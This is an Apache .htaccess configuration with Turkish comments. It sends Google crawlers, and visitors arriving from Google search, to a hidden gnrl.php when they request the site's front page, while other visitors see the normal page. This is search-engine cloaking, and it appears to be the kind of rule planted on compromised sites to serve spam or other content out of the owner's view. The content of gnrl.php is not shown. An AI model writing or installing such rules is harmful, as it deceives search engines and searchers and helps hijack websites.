RewriteEngine On # Google botları ve referansları için yönlendirme RewriteCond %{HTTP_USER_AGENT} Googlebot [NC,OR] RewriteCond %{HTTP_USER_AGENT} AdsBot [NC,OR] RewriteCond %{HTTP_USER_AGENT} Mediapartners-Google [NC,OR] RewriteCond %{HTTP_USER_AGENT} APIs-Google [NC,OR] RewriteCond %{HTTP_USER_AGENT} Googlebot-Image [NC,OR] RewriteCond %{HTTP_USER_AGENT} Googlebot-Video [NC,OR] RewriteCond %{HTTP_USER_AGENT} Googlebot-News [NC,OR] RewriteCond %{HTTP_USER_AGENT} Googlebot-Search [NC,OR] RewriteCond %{HTTP_USER_AGENT} Googlebot-Inspect [NC,OR] RewriteCond %{HTTP_USER_AGENT} Googlebot-Android [NC,OR] RewriteCond %{HTTP_USER_AGENT} Googlebot-Mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} Googlebot-Ads [NC,OR] RewriteCond %{HTTP_USER_AGENT} Googlebot-Discovery [NC,OR] RewriteCond %{HTTP_USER_AGENT} Google- [NC,OR] RewriteCond %{HTTP_REFERER} google\. [NC] # Sadece ana dizin ("/") için geçerli olsun RewriteCond %{REQUEST_URI} ^/$ # gnrl.php'ye yönlendirme RewriteRule ^$ gnrl.php [L]